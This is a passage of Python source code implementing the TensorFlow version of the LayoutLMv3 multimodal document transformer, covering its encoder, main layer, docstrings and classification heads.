        """2D (layout) relative-position bias: sum of horizontal and vertical components."""
        position_coord_x = bbox[:, :, 0]  # left
        position_coord_y = bbox[:, :, 3]  # bottom
        rel_pos_x = self._cal_pos_emb(
            self.rel_pos_x_bias,
            position_coord_x,
            self.rel_2d_pos_bins,
            self.max_rel_2d_pos,
        )
        rel_pos_y = self._cal_pos_emb(
            self.rel_pos_y_bias,
            position_coord_y,
            self.rel_2d_pos_bins,
            self.max_rel_2d_pos,
        )
        rel_2d_pos = rel_pos_x + rel_pos_y
        return rel_2d_pos
    def call(
        self,
        hidden_states: tf.Tensor,
        bbox: Optional[tf.Tensor] = None,
        attention_mask: Optional[tf.Tensor] = None,
        head_mask: Optional[tf.Tensor] = None,
        output_attentions: bool = False,
        output_hidden_states: bool = False,
        return_dict: bool = True,
        position_ids: Optional[tf.Tensor] = None,
        training: bool = False,
    ) -> Union[
        TFBaseModelOutput,
        Tuple[tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
    ]:
        all_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None
        # The position biases are computed once and shared across all layers.
        rel_pos = self._cal_1d_pos_emb(position_ids) if self.has_relative_attention_bias else None
        rel_2d_pos = self._cal_2d_pos_emb(bbox) if self.has_spatial_attention_bias else None
        for i, layer_module in enumerate(self.layer):
            if output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            layer_head_mask = head_mask[i] if head_mask is not None else None
            layer_outputs = layer_module(
                hidden_states,
                attention_mask,
                layer_head_mask,
                output_attentions,
                rel_pos=rel_pos,
                rel_2d_pos=rel_2d_pos,
                training=training,
            )
            hidden_states = layer_outputs[0]
            if output_attentions:
                all_self_attentions = all_self_attentions + (layer_outputs[1],)
        # Append the final hidden state so `hidden_states` has num_layers + 1 entries.
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        if return_dict:
            return TFBaseModelOutput(
                last_hidden_state=hidden_states,
                hidden_states=all_hidden_states,
                attentions=all_self_attentions,
            )
        else:
            return tuple(
                value for value in [hidden_states, all_hidden_states, all_self_attentions] if value is not None
            )
@keras_serializable
class TFLayoutLMv3MainLayer(tf.keras.layers.Layer):
    """Bare LayoutLMv3 transformer handling text + layout (and optionally image) inputs.

    Depending on the configuration, this layer embeds text tokens (with 1D and 2D
    position information), image patches, or both; concatenates the per-modality
    sequences; and runs them through a shared transformer encoder.

    Fix over the previous revision: ``call`` ended with a second, unreachable
    ``return TFBaseModelOutput(...)`` duplicating the one before it — the dead
    code has been removed; behavior is unchanged.
    """

    config_class = LayoutLMv3Config

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)

        self.config = config

        if config.text_embed:
            self.embeddings = TFLayoutLMv3TextEmbeddings(config, name="embeddings")

        if config.visual_embed:
            self.patch_embed = TFLayoutLMv3PatchEmbeddings(config, name="patch_embed")
            self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
            self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob, name="dropout")

            if config.has_relative_attention_bias or config.has_spatial_attention_bias:
                image_size = config.input_size // config.patch_size
                self.init_visual_bbox(image_size=(image_size, image_size))

            self.norm = tf.keras.layers.LayerNormalization(epsilon=1e-6, name="norm")

        self.encoder = TFLayoutLMv3Encoder(config, name="encoder")

    def build(self, input_shape: tf.TensorShape):
        if self.config.visual_embed:
            image_size = self.config.input_size // self.config.patch_size
            # Learnable [CLS] token prepended to the sequence of image patch embeddings.
            self.cls_token = self.add_weight(
                shape=(1, 1, self.config.hidden_size),
                initializer="zeros",
                trainable=True,
                dtype=tf.float32,
                name="cls_token",
            )
            # Learnable absolute position embeddings for [CLS] + every image patch.
            self.pos_embed = self.add_weight(
                shape=(1, image_size * image_size + 1, self.config.hidden_size),
                initializer="zeros",
                trainable=True,
                dtype=tf.float32,
                name="pos_embed",
            )
        super().build(input_shape)

    def get_input_embeddings(self) -> tf.keras.layers.Layer:
        return self.embeddings.word_embeddings

    def set_input_embeddings(self, value: tf.Variable):
        self.embeddings.word_embeddings.weight = value

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertMainLayer._prune_heads
    def _prune_heads(self, heads_to_prune):
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        raise NotImplementedError

    def init_visual_bbox(self, image_size: Tuple[int, int], max_len: int = 1000):
        """Precompute normalized bounding boxes for the [CLS] token and every image patch."""
        # We should not hardcode max_len to 1000, but it is done by the reference implementation,
        # so we keep it for compatibility with the pretrained weights. The more correct approach
        # would have been to pass on max_len=config.max_2d_position_embeddings - 1.
        height, width = image_size

        visual_bbox_x = tf.range(0, max_len * (width + 1), max_len) // width
        visual_bbox_x = tf.expand_dims(visual_bbox_x, axis=0)
        visual_bbox_x = tf.tile(visual_bbox_x, [width, 1])  # (width, width + 1)

        visual_bbox_y = tf.range(0, max_len * (height + 1), max_len) // height
        visual_bbox_y = tf.expand_dims(visual_bbox_y, axis=1)
        visual_bbox_y = tf.tile(visual_bbox_y, [1, height])  # (height + 1, height)

        # (x0, y0, x1, y1) per patch, flattened to one row per patch.
        visual_bbox = tf.stack(
            [visual_bbox_x[:, :-1], visual_bbox_y[:-1], visual_bbox_x[:, 1:], visual_bbox_y[1:]],
            axis=-1,
        )
        visual_bbox = tf.reshape(visual_bbox, [-1, 4])

        cls_token_box = tf.constant([[1, 1, max_len - 1, max_len - 1]], dtype=tf.int32)
        self.visual_bbox = tf.concat([cls_token_box, visual_bbox], axis=0)

    def calculate_visual_bbox(self, batch_size: int, dtype: tf.DType):
        """Tile the precomputed visual bounding boxes across the batch dimension."""
        visual_bbox = tf.expand_dims(self.visual_bbox, axis=0)
        visual_bbox = tf.tile(visual_bbox, [batch_size, 1, 1])
        visual_bbox = tf.cast(visual_bbox, dtype=dtype)
        return visual_bbox

    def embed_image(self, pixel_values: tf.Tensor) -> tf.Tensor:
        """Embed image patches and prepend the [CLS] token (plus position embeddings)."""
        embeddings = self.patch_embed(pixel_values)

        # add [CLS] token
        batch_size = tf.shape(embeddings)[0]
        cls_tokens = tf.tile(self.cls_token, [batch_size, 1, 1])
        embeddings = tf.concat([cls_tokens, embeddings], axis=1)

        # add position embeddings
        if getattr(self, "pos_embed", None) is not None:
            embeddings += self.pos_embed

        embeddings = self.norm(embeddings)
        return embeddings

    def get_extended_attention_mask(self, attention_mask: tf.Tensor) -> tf.Tensor:
        """Broadcast `attention_mask` to rank 4 and convert it into an additive mask."""
        # Adapted from transformers.modelling_utils.ModuleUtilsMixin.get_extended_attention_mask
        n_dims = len(attention_mask.shape)

        # We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
        # ourselves in which case we just need to make it broadcastable to all heads.
        if n_dims == 3:
            extended_attention_mask = tf.expand_dims(attention_mask, axis=1)
        elif n_dims == 2:
            # Provided a padding mask of dimensions [batch_size, seq_length].
            # Make the mask broadcastable to [batch_size, num_heads, seq_length, seq_length].
            extended_attention_mask = tf.expand_dims(attention_mask, axis=1)  # (batch_size, 1, seq_length)
            extended_attention_mask = tf.expand_dims(extended_attention_mask, axis=1)  # (batch_size, 1, 1, seq_length)
        else:
            raise ValueError(f"Wrong shape for attention_mask (shape {attention_mask.shape}).")

        # Since attention_mask is 1.0 for positions we want to attend and 0.0 for
        # masked positions, this operation will create a tensor which is 0.0 for
        # positions we want to attend and -10000.0 for masked positions.
        # Since we are adding it to the raw scores before the softmax, this is
        # effectively the same as removing these entirely.
        extended_attention_mask = tf.cast(extended_attention_mask, self.compute_dtype)
        extended_attention_mask = (1.0 - extended_attention_mask) * LARGE_NEGATIVE
        return extended_attention_mask

    def get_head_mask(self, head_mask: Optional[tf.Tensor]) -> Union[tf.Tensor, List[Optional[tf.Tensor]]]:
        """Expand `head_mask` to rank 5: (num_hidden_layers, batch, num_heads, seq, seq)."""
        if head_mask is None:
            return [None] * self.config.num_hidden_layers

        n_dims = tf.rank(head_mask)
        if n_dims == 1:
            # Gets a tensor with masks for each head (H).
            head_mask = tf.expand_dims(head_mask, axis=0)  # 1, num_heads
            head_mask = tf.expand_dims(head_mask, axis=0)  # 1, 1, num_heads
            head_mask = tf.expand_dims(head_mask, axis=-1)  # 1, 1, num_heads, 1
            head_mask = tf.expand_dims(head_mask, axis=-1)  # 1, 1, num_heads, 1, 1
            head_mask = tf.tile(
                head_mask, [self.config.num_hidden_layers, 1, 1, 1, 1]
            )  # seq_length, 1, num_heads, 1, 1
        elif n_dims == 2:
            # Gets a tensor with masks for each layer (L) and head (H).
            head_mask = tf.expand_dims(head_mask, axis=1)  # seq_length, 1, num_heads
            head_mask = tf.expand_dims(head_mask, axis=-1)  # seq_length, 1, num_heads, 1
            head_mask = tf.expand_dims(head_mask, axis=-1)  # seq_length, 1, num_heads, 1, 1
        elif n_dims != 5:
            raise ValueError(f"Wrong shape for head_mask (shape {head_mask.shape}).")
        assert tf.rank(head_mask) == 5, f"Got head_mask rank of {tf.rank(head_mask)}, but require 5."
        head_mask = tf.cast(head_mask, self.compute_dtype)
        return head_mask

    @unpack_inputs
    def call(
        self,
        input_ids: Optional[tf.Tensor] = None,
        bbox: Optional[tf.Tensor] = None,
        attention_mask: Optional[tf.Tensor] = None,
        token_type_ids: Optional[tf.Tensor] = None,
        position_ids: Optional[tf.Tensor] = None,
        head_mask: Optional[tf.Tensor] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        pixel_values: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[
        TFBaseModelOutput,
        Tuple[tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
    ]:
        # This method can be called with a variety of modalities:
        # 1. text + layout
        # 2. text + layout + image
        # 3. image
        # The complexity of this method is mostly just due to handling of these different modalities.

        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.return_dict

        if input_ids is not None:
            input_shape = tf.shape(input_ids)
            batch_size = input_shape[0]
            seq_length = input_shape[1]
        elif inputs_embeds is not None:
            input_shape = tf.shape(inputs_embeds)
            batch_size = input_shape[0]
            seq_length = input_shape[1]
        elif pixel_values is not None:
            batch_size = tf.shape(pixel_values)[0]
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds or pixel_values")

        # Determine which integer dtype to use.
        if input_ids is not None:
            int_dtype = input_ids.dtype
        elif bbox is not None:
            int_dtype = bbox.dtype
        elif attention_mask is not None:
            int_dtype = attention_mask.dtype
        elif token_type_ids is not None:
            int_dtype = token_type_ids.dtype
        else:
            int_dtype = tf.int32

        if input_ids is not None or inputs_embeds is not None:
            # Default to an all-ones mask, zero token types and zero boxes when not provided.
            if attention_mask is None:
                attention_mask = tf.ones((batch_size, seq_length), dtype=int_dtype)
            if token_type_ids is None:
                token_type_ids = tf.zeros((batch_size, seq_length), dtype=int_dtype)
            if bbox is None:
                bbox = tf.zeros((batch_size, seq_length, 4), dtype=int_dtype)

            embedding_output = self.embeddings(
                input_ids=input_ids,
                bbox=bbox,
                position_ids=position_ids,
                token_type_ids=token_type_ids,
                inputs_embeds=inputs_embeds,
                training=training,
            )

        final_bbox = None
        final_position_ids = None
        if pixel_values is not None:
            # embed image
            visual_embeddings = self.embed_image(pixel_values)

            # calculate attention mask
            visual_attention_mask = tf.ones((batch_size, tf.shape(visual_embeddings)[1]), dtype=int_dtype)
            if attention_mask is None:
                attention_mask = visual_attention_mask
            else:
                attention_mask = tf.concat([attention_mask, visual_attention_mask], axis=1)

            # calculate bounding boxes
            if self.config.has_spatial_attention_bias:
                visual_bbox = self.calculate_visual_bbox(batch_size, int_dtype)
                if bbox is None:
                    final_bbox = visual_bbox
                else:
                    final_bbox = tf.concat([bbox, visual_bbox], axis=1)

            # calculate position IDs
            if self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
                visual_position_ids = tf.range(0, tf.shape(visual_embeddings)[1], dtype=int_dtype)
                visual_position_ids = tf.expand_dims(visual_position_ids, axis=0)
                visual_position_ids = tf.tile(visual_position_ids, [batch_size, 1])

                if input_ids is not None or inputs_embeds is not None:
                    position_ids = tf.expand_dims(tf.range(0, seq_length, dtype=int_dtype), axis=0)
                    position_ids = tf.tile(position_ids, [batch_size, 1])
                    final_position_ids = tf.concat([position_ids, visual_position_ids], axis=1)
                else:
                    final_position_ids = visual_position_ids

            # calculate embeddings
            if input_ids is None and inputs_embeds is None:
                embedding_output = visual_embeddings
            else:
                embedding_output = tf.concat([embedding_output, visual_embeddings], axis=1)
            embedding_output = self.LayerNorm(embedding_output)
            embedding_output = self.dropout(embedding_output, training=training)
        elif self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
            if self.config.has_relative_attention_bias:
                position_ids = tf.expand_dims(tf.range(0, seq_length, dtype=int_dtype), axis=0)
                position_ids = tf.tile(position_ids, [batch_size, 1])
                final_position_ids = position_ids
            if self.config.has_spatial_attention_bias:
                final_bbox = bbox

        extended_attention_mask = self.get_extended_attention_mask(attention_mask)

        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape batch_size x num_heads x seq_length x seq_length
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask)

        encoder_outputs = self.encoder(
            embedding_output,
            bbox=final_bbox,
            position_ids=final_position_ids,
            attention_mask=extended_attention_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        sequence_output = encoder_outputs[0]

        if not return_dict:
            return (sequence_output,) + encoder_outputs[1:]

        return TFBaseModelOutput(
            last_hidden_state=sequence_output,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
class TFLayoutLMv3PreTrainedModel(TFPreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    config_class = LayoutLMv3Config
    base_model_prefix = "layoutlmv3"

    @property
    def dummy_inputs(self) -> Dict[str, tf.Tensor]:
        """Dummy text + image inputs (batch of 2) used to build the model's weights."""
        size = self.config.input_size
        # Random pixel values shaped (batch=2, num_channels, height, width).
        image_shape = (2, self.config.num_channels, size, size)
        pixel_values = tf.random.uniform(shape=image_shape, minval=-1, maxval=1)
        return {
            "input_ids": tf.constant(_DUMMY_INPUT_IDS, dtype=tf.int32),
            "bbox": tf.constant(_DUMMY_BBOX, dtype=tf.int32),
            "pixel_values": pixel_values,
        }

    # Fixed input signature so the model can be exported via `tf.saved_model.save`.
    @tf.function(
        input_signature=[
            {
                "input_ids": tf.TensorSpec((None, None), tf.int32, name="input_ids"),
                "bbox": tf.TensorSpec((None, None, 4), tf.int32, name="bbox"),
                "pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
                "attention_mask": tf.TensorSpec((None, None), tf.int32, name="attention_mask"),
            }
        ]
    )
    def serving(self, inputs):
        """
        Method used for serving the model.

        Args:
            inputs (`Dict[str, tf.Tensor]`):
                The input of the saved model as a dictionary of tensors.
        """
        output = self.call(inputs)
        return self.serving_output(output)
LAYOUTLMV3_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TensorFlow models and layers in `transformers` accept two formats as input:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional argument.
The reason the second format is supported is that Keras methods prefer this format when passing inputs to models
and layers. Because of this support, when using methods like `model.fit()` things should "just work" for you - just
pass your inputs and labels in any format that `model.fit()` supports! If, however, you want to use the second
format outside of Keras methods like `fit()` and `predict()`, such as when creating your own layers or models with
the Keras `Functional` API, there are three possibilities you can use to gather all the input Tensors in the first
positional argument:
- a single Tensor with `input_ids` only and nothing else: `model(input_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([input_ids, attention_mask])` or `model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
Note that when creating models and layers with
[subclassing](https://keras.io/guides/making_new_layers_and_models_via_subclassing/) then you don't need to worry
about any of this, as you can just pass inputs like you would to any other Python function!
</Tip>
Parameters:
config ([`LayoutLMv3Config`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
LAYOUTLMV3_INPUTS_DOCSTRING = r"""
Args:
input_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
bbox (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length, 4)`, *optional*):
Bounding boxes of each input sequence tokens. Selected in the range `[0,
config.max_2d_position_embeddings-1]`. Each bounding box should be a normalized version in (x0, y0, x1, y1)
format, where (x0, y0) corresponds to the position of the upper left corner in the bounding box, and (x1,
y1) represents the position of the lower right corner.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
pixel_values (`tf.Tensor` of shape `(batch_size, num_channels, height, width)`):
Batch of document images. Each image is divided into patches of shape `(num_channels, config.patch_size,
config.patch_size)` and the total number of patches (=`patch_sequence_length`) equals to `((height /
config.patch_size) * (width / config.patch_size))`.
attention_mask (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are position IDs?](../glossary#position-ids)
head_mask (`tf.Tensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert *input_ids* indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
    "The bare LayoutLMv3 Model transformer outputting raw hidden-states without any specific head on top.",
    LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3Model(TFLayoutLMv3PreTrainedModel):
    # names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
    _keys_to_ignore_on_load_unexpected = [r"position_ids"]

    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        # All modality handling and the transformer stack live in the shared main layer.
        self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")

    @unpack_inputs
    @add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=TFBaseModelOutput, config_class=_CONFIG_FOR_DOC)
    def call(
        self,
        input_ids: Optional[tf.Tensor] = None,
        bbox: Optional[tf.Tensor] = None,
        attention_mask: Optional[tf.Tensor] = None,
        token_type_ids: Optional[tf.Tensor] = None,
        position_ids: Optional[tf.Tensor] = None,
        head_mask: Optional[tf.Tensor] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        pixel_values: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[
        TFBaseModelOutput,
        Tuple[tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
    ]:
        r"""
        Returns:

        Examples:

        ```python
        >>> from transformers import AutoProcessor, TFAutoModel
        >>> from datasets import load_dataset

        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = TFAutoModel.from_pretrained("microsoft/layoutlmv3-base")

        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]

        >>> encoding = processor(image, words, boxes=boxes, return_tensors="tf")

        >>> outputs = model(**encoding)
        >>> last_hidden_states = outputs.last_hidden_state
        ```"""
        # Pure delegation: the main layer handles all modality combinations.
        outputs = self.layoutlmv3(
            input_ids=input_ids,
            bbox=bbox,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            pixel_values=pixel_values,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )

        return outputs

    def serving_output(self, output: TFBaseModelOutput) -> TFBaseModelOutput:
        # Convert the per-layer tuples into stacked tensors for SavedModel serving.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFBaseModelOutput(
            last_hidden_state=output.last_hidden_state,
            hidden_states=hs,
            attentions=attns,
        )
class TFLayoutLMv3ClassificationHead(tf.keras.layers.Layer):
    """
    Head for sentence-level classification tasks. Reference: RobertaClassificationHead
    """

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        # Fall back to the generic hidden dropout when no classifier-specific rate is configured.
        dropout_rate = (
            config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob
        )
        self.dense = tf.keras.layers.Dense(
            config.hidden_size,
            activation="tanh",
            kernel_initializer=get_initializer(config.initializer_range),
            name="dense",
        )
        self.dropout = tf.keras.layers.Dropout(dropout_rate, name="dropout")
        self.out_proj = tf.keras.layers.Dense(
            config.num_labels,
            kernel_initializer=get_initializer(config.initializer_range),
            name="out_proj",
        )

    def call(self, inputs: tf.Tensor, training: bool = False) -> tf.Tensor:
        # dropout -> dense(tanh) -> dropout -> linear projection to num_labels.
        hidden = self.dropout(inputs, training=training)
        hidden = self.dense(hidden)
        hidden = self.dropout(hidden, training=training)
        return self.out_proj(hidden)
@add_start_docstrings(
    """
    LayoutLMv3 Model with a sequence classification head on top (a linear layer on top of the final hidden state of the
    [CLS] token) e.g. for document image classification tasks such as the
    [RVL-CDIP](https://www.cs.cmu.edu/~aharley/rvl-cdip/) dataset.
    """,
    LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3ForSequenceClassification(TFLayoutLMv3PreTrainedModel, TFSequenceClassificationLoss):
    # names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
    _keys_to_ignore_on_load_unexpected = [r"position_ids"]

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(config, **kwargs)
        self.config = config
        self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")
        # Roberta-style classification head applied to the [CLS] representation.
        self.classifier = TFLayoutLMv3ClassificationHead(config, name="classifier")

    @unpack_inputs
    @add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=TFSequenceClassifierOutput, config_class=_CONFIG_FOR_DOC)
    def call(
        self,
        input_ids: Optional[tf.Tensor] = None,
        attention_mask: Optional[tf.Tensor] = None,
        token_type_ids: Optional[tf.Tensor] = None,
        position_ids: Optional[tf.Tensor] = None,
        head_mask: Optional[tf.Tensor] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        labels: Optional[tf.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        bbox: Optional[tf.Tensor] = None,
        pixel_values: Optional[tf.Tensor] = None,
        training: Optional[bool] = False,
    ) -> Union[
        TFSequenceClassifierOutput,
        Tuple[tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
        Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor],
    ]:
        """
        labels (`tf.Tensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the sequence classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.

        Returns:

        Examples:

        ```python
        >>> from transformers import AutoProcessor, TFAutoModelForSequenceClassification
        >>> from datasets import load_dataset
        >>> import tensorflow as tf

        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = TFAutoModelForSequenceClassification.from_pretrained("microsoft/layoutlmv3-base")

        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]

        >>> encoding = processor(image, words, boxes=boxes, return_tensors="tf")
        >>> sequence_label = tf.convert_to_tensor([1])

        >>> outputs = model(**encoding, labels=sequence_label)
        >>> loss = outputs.loss
        >>> logits = outputs.logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        outputs = self.layoutlmv3(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            bbox=bbox,
            pixel_values=pixel_values,
            training=training,
        )
        # Classify from the final hidden state of the first ([CLS]) token.
        sequence_output = outputs[0][:, 0, :]
        logits = self.classifier(sequence_output, training=training)

        loss = None if labels is None else self.hf_compute_loss(labels, logits)

        if not return_dict:
            # Re-pack as a plain tuple, prepending the loss when it was computed.
            output = (logits,) + outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TFSequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )

    # Copied from transformers.models.bert.modeling_tf_bert.TFBertForSequenceClassification.serving_output
    def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
        # Convert the per-layer tuples into stacked tensors for SavedModel serving.
        hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None

        return TFSequenceClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
    """
    LayoutLMv3 Model with a token classification head on top (a linear layer on top of the final hidden states) e.g.
    for sequence labeling (information extraction) tasks such as [FUNSD](https://guillaumejaume.github.io/FUNSD/),
    [SROIE](https://rrc.cvc.uab.es/?ch=13), [CORD](https://github.com/clovaai/cord) and
    [Kleister-NDA](https://github.com/applicaai/kleister-nda).
    """,
    LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3ForTokenClassification(TFLayoutLMv3PreTrainedModel, TFTokenClassificationLoss):
    # names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
    _keys_to_ignore_on_load_unexpected = [r"position_ids"]

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(config, **kwargs)
        self.num_labels = config.num_labels

        self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")
        self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob, name="dropout")
        # Small label sets get a single linear layer, larger ones the Roberta-style head
        # (presumably to mirror the reference implementation — TODO confirm against the PyTorch model).
        if config.num_labels < 10:
            self.classifier = tf.keras.layers.Dense(
                config.num_labels,
                kernel_initializer=get_initializer(config.initializer_range),
                name="classifier",
            )
        else:
            self.classifier = TFLayoutLMv3ClassificationHead(config, name="classifier")

    @unpack_inputs
    @add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
